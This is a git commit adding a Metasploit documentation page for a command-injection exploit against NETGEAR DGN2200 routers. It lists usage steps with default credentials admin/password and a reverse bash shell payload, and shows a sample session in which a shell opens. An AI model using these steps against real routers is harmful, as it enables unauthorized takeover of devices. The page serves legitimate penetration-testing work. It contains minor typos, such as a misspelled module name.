Create netgear_dnslookup_cmd_exec.md

2017-03-02 19:43:15 -05:00 · 2017-03-02 19:43:15 -05:00 · 4a974d50b5
parent e0a46c2c06
commit 4a974d50b5
1 changed files with 86 additions and 0 deletions
--- a/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md
@ -0,0 +1,86 @@
+## Vulnerable Application
+
+  NETGEAR DGN2200v1, DGN2200v2, DGN2200v3, DGN2200v4 routers
+
+## Verification Steps
+
+  1. start `msfconsole`
+  2. `use exploit/linux/http/netger_dnslookup_cmd_exec`
+  3. `set RHOST 192.168.1.1` `<--- Router IP`
+  4. `set USERNAME xxxx` (see [here]())
+  5. `set PASSWORD xxxx` (see [here]())
+  5. `set PAYLOAD cmd/unix/reverse_bash`
+  6. `set LHOST 192.168.1.x`
+  7. `set LPORT xxxx`
+  8. `run`
+  9. Get a session
+
+## Options
+
+  **USERNAME**
+
+  The `USERNAME` option sets the username to authenticate the request with.
+  The command injection will __not__ succeed if the username and password are not correct.
+  The default username for NETGEAR Routers is `admin`. If you don't know the credentials,
+  your best bet will be to use the default username and password.
+  
+  
+  **PASSWORD**
+  
+  The `PASSWORD`options sets the password to authenticate the request with.
+  The command injection will __not__ succeed if the username and password are not correct.
+  The default password for NETGEAR Routers is `password`. If you don't know the credentials,
+  your best bet will be to use the default username and password.
+  
+## Advanced Options
+  
+  **HOSTNAME**
+  
+  The request is went with a `host_name` POST parameter. This option sets this parameter. 
+  The default is `www.google.com`. The reason for the parameter is that the file that this
+  vulnerability is located in (`dnslookup.cgi`) actually needs a domain to resolve, or else 
+  the injection won't work.
+  
+
+## Scenarios
+
+  What it should look like against a vulnerable router.
+
+  ```
+msf > use exploit/linux/http/netgear_dnslookup_cmd_exec 
+msf exploit(netgear_dnslookup_cmd_exec) > options
+
+Module options (exploit/linux/http/netgear_dnslookup_cmd_exec):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD                   yes       Password to authenticate with
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST                      yes       The target address
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME                   yes       Username to authenticate with
+   VHOST                      no        HTTP server virtual host
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   NETGEAR DDGN2200 Router
+
+
+msf exploit(netgear_dnslookup_cmd_exec) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf exploit(netgear_dnslookup_cmd_exec) > set USERNAME admin
+USERNAME => admin
+msf exploit(netgear_dnslookup_cmd_exec) > set PASSWORD password
+PASSWORD => password
+msf exploit(netgear_dnslookup_cmd_exec) > run
+
+[*] Started reverse TCP double handler on 192.168.1.9:4444 
+[+] Router is a NETGEAR router (DGN2200v1)
+[*] Sending payload...
+[*] Command shell session 1 opened (192.168.1.9:4444 -> 192.168.1.9:53352) at 2017-03-02 19:36:47 -0500
+```
+